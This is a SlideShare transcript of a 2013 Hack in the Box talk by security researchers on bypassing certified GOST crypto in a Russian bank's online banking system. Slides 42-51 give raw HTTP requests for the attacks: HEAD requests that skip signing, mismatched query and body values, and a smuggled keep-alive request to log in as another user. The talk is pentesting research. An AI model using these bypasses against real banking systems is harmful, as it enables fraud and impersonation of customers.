Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
You Can Be Anything You Want to Be: Breaking Through Certified Crypto          in Banking Apps        Andrew Petukhov (Fou...
And along comes…INTRO    George Noseevich    Andrew Petukhov    Dennis Gamayunov                       2
Part One __________________________________________________________________/                                              ...
What we see __________________________________________________________________/|• An RBS, which uses crypto for           ...
Whats it going to                    be then, eh?__________________________________________________________________/      ...
What comes with                   UltraViolence__________________________________________________________________/|• Bypas...
And along comes…SYSTEM UNDER ASSESSMENT    George Noseevich    Andrew Petukhov    Dennis Gamayunov                        ...
Target application                      type (1/3)__________________________________________________________________/|• We...
Target application                      type (2/3)__________________________________________________________________/ • Te...
Target application                      type (3/3)__________________________________________________________________/|• So...
Seeding the arch __________________________________________________________________/                         Business logi...
let’s add some REQs __________________________________________________________________/                                   ...
a little bit more... __________________________________________________________________/                                  ...
And along comes…METHODOLOGY    George Noseevich    Andrew Petukhov    Dennis Gamayunov                       14
Common sense suggests __________________________________________________________________/|• One doesn’t simply implement  ...
Objective __________________________________________________________________/                                             ...
Basic steps for                      reversing arch__________________________________________________________________/    ...
Dealing with client                            side crypto________________________________________________________________...
Because nothing                            ever changes…__________________________________________________________________...
Fingerprinting HTTP                               parsers_________________________________________________________________...
Fingerprinting WWW                                 server_________________________________________________________________...
Because nothing                         ever changes… __________________________________________________________________/ ...
Fingerprinting                  integration protocol__________________________________________________________________/|• ...
And along comes…CASE STUDY    George Noseevich    Andrew Petukhov    Dennis Gamayunov                       24
It all started as an                          ordinary hack_______________________________________________________________...
…then the crypto                        came into play__________________________________________________________________/|...
Reversing the client __________________________________________________________________/                                  ...
Reversing the client:                         the lazy way________________________________________________________________...
API call trace __________________________________________________________________/                                        ...
API call trace __________________________________________________________________/                                        ...
API call trace __________________________________________________________________/                                        ...
API call trace __________________________________________________________________/                                        ...
API call trace __________________________________________________________________/                                        ...
API call trace __________________________________________________________________/                                        ...
API call trace __________________________________________________________________/                                        ...
API call trace __________________________________________________________________/                                        ...
API call trace __________________________________________________________________/                                        ...
API call trace __________________________________________________________________/                                        ...
so it comes like this   __________________________________________________________________  /                             ...
and is secured like                                       this ___________________________________________________________...
Further notices __________________________________________________________________/ ● Proxy signs query string for GET,   ...
Non-repudiation                                                      Take one   __________________________________________...
Non-repudiation                                                   Take one _______________________________________________...
Non-repudiation                                                     Take two  ____________________________________________...
Non-repudiation                                                   Take two _______________________________________________...
Non-repudiation                                    Take two – Exploit (!!!) ______________________________________________...
So what? __________________________________________________________________/                                              ...
Authentication                                       Log in as any other user ____________________________________________...
Authentication                            Crypto id and session id do not match __________________________________________...
Authentication                                                        But… _______________________________________________...
Authentication                                                        But… _______________________________________________...
And along comes…WRAP UP    George Noseevich    Andrew Petukhov    Dennis Gamayunov                       52
At first I was                            like…__________________________________________________________________/|  • How...
But then… __________________________________________________________________/|  • It looks more intriguing                ...
No surprise __________________________________________________________________/| • I definitely believe that              ...
Violent curiosity                       leads to…__________________________________________________________________/|• …su...
Contacts __________________________________________________________________/                                              ...
Upcoming SlideShare
Loading in …5
×

You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps

780 views

Published on

Our talk from Hack in the Box Amsterdam 2013.
It’s no surprise that a typical hackers professional path hits against custom crypto protocols from time to time. There are lots of application-specific crypto-hardened protocols written from scratch which could be found in banking, SCADA, and other types of not-so-common hardware and software systems. In this presentation, we propose a methodology for breaking into such systems using a top-down approach with GOST-hardened banking applications as an example. We show how easy it is to bypass complex crypto protections because of developers having inconsistent knowledge of modern application level protocols.

  • Be the first to comment

You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps

  1. 1. You Can Be Anything You Want to Be: Breaking Through Certified Crypto in Banking Apps Andrew Petukhov (Founder/CTO, Solidlab) George Noseevich (PhD student, MSU) Dennis Gamayunov (Acting Head, Information Systems Security Lab, MSU)
  2. 2. And along comes…INTRO George Noseevich Andrew Petukhov Dennis Gamayunov 2
  3. 3. Part One __________________________________________________________________/ |There was me, that is Dennis, || ||and my two droogs, that is || ||Georgie and Andrew, and we sat || ||in the lab making up our || ||rassoodocks what to do with the || ||Big Bank’s RBS, a GOST crypto || ||hardened bastard though rare. || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 3 || ||
  4. 4. What we see __________________________________________________________________/|• An RBS, which uses crypto for || || – Non-repudiation || || – Authenticity || || – Protocol security || ||| • RBS comply with Russian Central | ||| Bank regulations | || ||• …unbreakable : -( ~ | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 4 || ||
  5. 5. Whats it going to be then, eh?__________________________________________________________________/ | || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 5 || ||
  6. 6. What comes with UltraViolence__________________________________________________________________/|• Bypass non-repudiation (force ||| RBS to process non-signed | ||| requests) | ||| • Bypass second authentication | ||| layer (enforced with crypto) | ||| • Which finally allowed to login | ||| into RBS as any valid user and | || file any request to the RBS | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 6 || ||
  7. 7. And along comes…SYSTEM UNDER ASSESSMENT George Noseevich Andrew Petukhov Dennis Gamayunov 7
  8. 8. Target application type (1/3)__________________________________________________________________/|• We aim at pentesting financial || || organizations, who try to: || || – Ensure transport layer security, || || non-repudiation and authentication || || – Comply with regulations || || – Protect legacy systems || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 8 || ||
  9. 9. Target application type (2/3)__________________________________________________________________/ • Technical best-practices | || – Confidentiality, authenticity, non- || repudiation || • Compliance || || – Use of certified crypto || • Business needs || || – In-house vs outsource || – Solid vs modular || – Customer does not simply develop his own || | certified crypto| || – Outsourcing app development to certified | crypto writers – never a good idea / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 9 || ||
  10. 10. Target application type (3/3)__________________________________________________________________/|• Solution: crypto hardened thick || || client + server side || || application specific crypto || || proxy || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 10 || ||
  11. 11. Seeding the arch __________________________________________________________________/ Business logic over HTTP | || Client side Server side || || || || || || || || || || Browser RBS Application || Server || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 11 || ||
  12. 12. let’s add some REQs __________________________________________________________________/ | || Req++: Transport security & Certified crypto || Client side Server side || || || || || || || || Crypto server powered by | certified crypto provider RBS Application| Browser Tunnel endpoint | Terminates tunnel Server| || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 12 || ||
  13. 13. a little bit more... __________________________________________________________________/ | Req++: Authenticity & Non-repudiation || | Client side Server side| || || || || || || || Crypto server RBS Application || Browser Tunnel endpoint Server | Verifies signature| Signs ingress request If ok logs for non-repudiation Trusts custom headers || Puts everything into and passes upstream Matches id from session || custom headers with id from header | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 13 || ||
  14. 14. And along comes…METHODOLOGY George Noseevich Andrew Petukhov Dennis Gamayunov 14
  15. 15. Common sense suggests __________________________________________________________________/|• One doesn’t simply implement ||| application level crypto protocol | ||| • One doesn’t simply implement HTTP | || client or server from scratch || ||| • Many parsers in a row suggest | || inconsistencies => possibility for || || smuggling || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 15 || ||
  16. 16. Objective __________________________________________________________________/ | ||| • Objective: | || – find differences in HTTP handling at || || crypto server side and at application || server side || ||| • Exploit: | || – use differences to bypass signature || || validation || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 16 || ||
  17. 17. Basic steps for reversing arch__________________________________________________________________/ | ||• Reverse client side features || ||• Survey server side features || ||• Fingerprint integration protocol || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 17 || ||
  18. 18. Dealing with client side crypto__________________________________________________________________/| • Which HTTP client and what HTTP || parser are used? || || – i.e. windows API or java HttpClient ||| • What parts of HTTP request are | || getting signed? || || – in POST? in GET? in HEAD? in TRACE? ||| • What additional metadata is | || attached to requests? || || – how signature is stored? | – how key ID is passed to the server? / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 18 || ||
  19. 19. Because nothing ever changes…__________________________________________________________________/| • XML Signature Wrapping || – another kind of “You can be anything you want || to be” www.youtube.com/watch?v=RHIkb9yEV1k || || – “Analysis of Signature Wrapping Attacks and || Countermeasures“ || || • CWE-347: Improper Verification of || Cryptographic Signature and related CVE || || • Web App Cryptology: A Study in Failure || || • Now and then: Insecure random numbers || | • Now and then: Improper PKI implementation / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 19 || ||
  20. 20. Fingerprinting HTTP parsers__________________________________________________________________/ |• HTTP parameter pollution || || – the same parameter in query or body || – the same parameter in query and body || ||• Duplicate headers || – control headers with metadata || || – Content-Length header || || • HTTP parameter contamination || – which characters are valid for termination || of header values? || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 20 || ||
  21. 21. Fingerprinting WWW server__________________________________________________________________/ |• Which HTTP version is supported? || || – does crypto server support multiple HTTP || requests per connection? || – does it support HTTP/0.9 || ||• How does crypto server treat incorrect || || or duplicate Content-Length headers? ||• Which HTTP methods does it support? || ||• Does crypto server support multipart || || requests or chunked encoding? | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 21 || ||
  22. 22. Because nothing ever changes… __________________________________________________________________/ | || • Google for <HPP bypass WAF> || || • CWE-444: Inconsistent Interpretation of || || HTTP Requests || • and all the CVE instances related to CWE- || || 444 || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 22 || ||
  23. 23. Fingerprinting integration protocol__________________________________________________________________/|• How crypto server communicates ||| validation status and metadata to | || application server? || || – meta data is relayed as submitted by || || the client || – in yet unknown part of the request || || – how to get into that part? || | • HTTP Trace method/Debug interface in web| || application/Guess/Brutefroce/Read | documentation/Ask developers aka Social engineer / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 23 || ||
  24. 24. And along comes…CASE STUDY George Noseevich Andrew Petukhov Dennis Gamayunov 24
  25. 25. It all started as an ordinary hack__________________________________________________________________/ | || ● Test our shiny RBS web app, they || || said || || ● It comes with a certified crypto || || protection, they said || || ● Instantly found some common web app || || bugs || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 25 || ||
  26. 26. …then the crypto came into play__________________________________________________________________/| ● Crypto ensures non-repudiation ||| – Your crypto-signed attack vectors | || will be used against you in court || || ● Crypto ensures authenticity || || – Session hijacking is essentially || useless || || – Cant login as other user without ||| his keys | || ● This greatly reduces severity | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 26 || ||
  27. 27. Reversing the client __________________________________________________________________/ | ● Closed-source windows app || || ●| Traffic dump gives no clues | ||| ● The protocol is custom, no docs | ||| available | || || ● No time for long IDA sessions || ||| ● Seems tough  | || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 27 || ||
  28. 28. Reversing the client: the lazy way__________________________________________________________________/ | ●Client uses crypto primitives || || from bundled shared libs || || ●| Library call hooks and API call | ||| traces FTW! | ||| ●Filter traces to get data that | ||| is easy to understand | || ||• API Monitor (bit.ly/37BTzf) | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 28 || ||
  29. 29. API call trace __________________________________________________________________/ | || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 29 || ||
  30. 30. API call trace __________________________________________________________________/ | Encrypt user data || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 30 || ||
  31. 31. API call trace __________________________________________________________________/ | What is being encrypted? || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 31 || ||
  32. 32. API call trace __________________________________________________________________/ | What is being encrypted? || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 32 || ||
  33. 33. API call trace __________________________________________________________________/ | What is being encrypted? || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 33 || ||
  34. 34. API call trace __________________________________________________________________/ | What is being signed? || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 34 || ||
  35. 35. API call trace __________________________________________________________________/ | Send it through the tunnel || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 35 || ||
  36. 36. API call trace __________________________________________________________________/ | Receive encrypted response || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 36 || ||
  37. 37. API call trace __________________________________________________________________/ | Decrypt the response || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 37 || ||
  38. 38. API call trace __________________________________________________________________/ | Send it back to browser || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 38 || ||
  39. 39. so it comes like this __________________________________________________________________ / | Req++: Authenticity & Non-repudiation | | | Client side Server side | | | | |GET /login?name=value HTTP/1.1 | |Host: 10.6.28.19 | | | | | | | | Crypto server RBS Application | | Browser Tunnel endpoint Server | Verifies signature | Signs ingress request If ok logs for non-repudiation Trusts custom headers | | Puts everything into and passes upstream Matches id from session | | custom headers with id from header | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 39 || ||
  40. 40. and is secured like this __________________________________________________________________/ | Req++: Authenticity & Non-repudiation || | Client side Server side| || GET /login?name=value HTTP/1.1 || Host: 10.6.28.19 || Certificate_number: 0x849 || Form_data: name=value || Signature: || 6B8A57A3EA9C25D77C01F4E957D5752C69F61D || Crypto server RBS Application | 3451E87DD18046C51DC9A9AD63C7718708159B Browser Tunnel endpoint Server| Verifies signature || 7ECF5FC8EDF4424F813DB65EF5E2D21D2F389E Signs ingress request | If ok logs for non-repudiation Trusts custom headers| 03319CA25D7003 Puts everything into and passes upstream Matches id from session || custom headers with id from header | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 40 || ||
  41. 41. Further notices __________________________________________________________________/ ● Proxy signs query string for GET, | || message body for POST || ●| The server actually checks that | || Form_data reflects the query || string/body || || ● The server checks the Cert_num and || signature || || ● The web app checks that cert_num || matches the current user || || ● Kinda unbreakable, heh? | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 41 || ||
  42. 42. Non-repudiation Take one __________________________________________________________________ / | Bypass Non-repudiation | | | | Client side Server side | | | |HEAD /bank/welcome?name=value HTTP/1.1 | |Host: 10.6.28.19 | | | | | | | | Crypto server RBS Application | | Browser Tunnel endpoint Server | | | | | | | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 42 || ||
  43. 43. Non-repudiation Take one __________________________________________________________________/ | Bypass Non-repudiation || || Client side Server side || || HEAD /bank/welcome?name=value HTTP/1.1 || Host: 10.6.28.19 || Certificate_number: 0x849 || || || Crypto server RBS Application || Browser Tunnel endpoint Server || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 43 || ||
  44. 44. Non-repudiation Take two __________________________________________________________________ / | Bypass Non-repudiation | | | | Client side Server side | | | |POST /bank/welcome?name=value1 HTTP/1.1 | |Host: 10.6.28.19 | | |Content-Length: 15 | | | |name=value2 | Crypto server RBS Application | | Browser Tunnel endpoint Server | | | | | | | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 44 || ||
  45. 45. Non-repudiation Take two __________________________________________________________________/ | POST /bank/welcome?name=value1 HTTP/1.1 Bypass Non-repudiation || Host: 10.6.28.19 || Client side Server side | Content-Length: 15| Certificate_number: 0x849 || | Form_data: name=value2| || Signature: || 3195E979E107731A2572197AB9D8BC01CE2C7EE0C4 || 2B97A02393F1263C23E25D2D21E7AA7CB07114491A || 72750C2EFD1AEEAEB357C874BFB3100336F5BD01C0 Crypto server RBS Application || Browser Tunnel endpoint Server | 0C| || name=value2 || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 45 || ||
  46. 46. Non-repudiation Take two – Exploit (!!!) __________________________________________________________________/ | POST /bank/welcome?name=attack-value HTTP/1.1 Bypass Non-repudiation || Host: 10.6.28.19 || Client side Server side | Content-Length: 15| Certificate_number: 0x849 || | Form_data: name=common-value| || Signature: || 3195E979E107731A2572197AB9D8BC01CE2C7EE0C42B9 || 7A02393F1263C23E25D2D21E7AA7CB07114491A72750C || 2EFD1AEEAEB357C874BFB3100336F5BD01C00C RBS Application Crypto server || Browser Tunnel endpoint Server || name=common-value || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 46 || ||
  47. 47. So what? __________________________________________________________________/ | In Soviet Russia who cares about repudiation? || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 47 || ||
  48. 48. Authentication Log in as any other user __________________________________________________________________/ | Bypass crypto authentication || | Client side Server side| || || POST http://10.6.28.19/login HTTP/1.1 || Host: 10.6.28.19 || Content-Type: application/x-www-form- || urlencoded || Content-Length: 36 || Crypto server RBS Application | Certificate_number: 0x717 Browser Tunnel endpoint| Server || | sName=772965163660&sPass=valid.60| || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 48 || ||
  49. 49. Authentication Crypto id and session id do not match __________________________________________________________________/ | Bypass crypto authentication || | Client side Server side| || || || || || || || Crypto server RBS Application || Browser Tunnel endpoint Server || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 49 || ||
  50. 50. Authentication But… __________________________________________________________________/ HEAD| Bypass crypto authentication ||http://10.6.28.19/login?sName=772865163421 ||&sPass=valid.21 HTTP/1.1 Client side Server side ||Host: 10.6.28.19 ||Connection: keep-alive ||Content-Length: 10 || ||p=nonemptybody || | POST http://10.6.28.19/login HTTP/1.1 Crypto server| RBS Application ||Host: 10.6.28.19 Browser Tunnel endpoint Server ||Content-Type: application/x-www-form- ||urlencoded ||Content-Length: 36 |Certificate_number: 0x717 / ------------------------------------------------------------------ sName=772965163660&sPass=valid.60 George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 50 || ||
  51. 51. Authentication But… __________________________________________________________________/ | HEAD Bypass crypto authentication || http://10.6.28.19/login?sName=772865163421&sPass=| Client side Server side| valid.21 HTTP/1.1 || Host: 10.6.28.19 || Connection: keep-alive || | Content-Length: 10| || Certificate_number: 0x849 || || p=nonemptybody Crypto server RBS Application || Browser Tunnel endpoint POST http://10.6.28.19/login HTTP/1.1 Server || Host: 10.6.28.19 || Content-Type: application/x-www-form-urlencoded || Content-Length: 36 | / Certificate_number: 0x717 ------------------------------------------------------------------ ^__^ sName=772965163660&sPass=valid.60 George Noseevich Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 51 || ||
  52. 52. And along comes…WRAP UP George Noseevich Andrew Petukhov Dennis Gamayunov 52
  53. 53. At first I was like…__________________________________________________________________/| • How typical pentester sees custom crypto | | protocol || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 53 || ||
  54. 54. But then… __________________________________________________________________/| • It looks more intriguing || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 54 || ||
  55. 55. No surprise __________________________________________________________________/| • I definitely believe that || cryptography is becoming less ||| important. In effect, even the most | || secure computer systems in the most || || isolated locations have been || penetrated over the last couple of || || years by a series of APTs and other || advanced attacks, Shamir said during || || the Cryptographers Panel session at || the RSA Conference 2013 | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 55 || ||
  56. 56. Violent curiosity leads to…__________________________________________________________________/|• …successful bypass || || || || || || || || || || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 56 || ||
  57. 57. Contacts __________________________________________________________________/ | || || || || George @webpentest Noseevich || webpentest@bushwhackers.ru || Andrew @p3tand Petukhov || andrew.petukhov@solidlab.ru || Dennis @jamadharma Gamayunov || gamajun@seclab.cs.msu.su || || || || | / ------------------------------------------------------------------ George Noseevich ^__^ Andrew Petukhov (oo)_______ Dennis Gamayunov (__) )/ ||----w | 57 || ||

×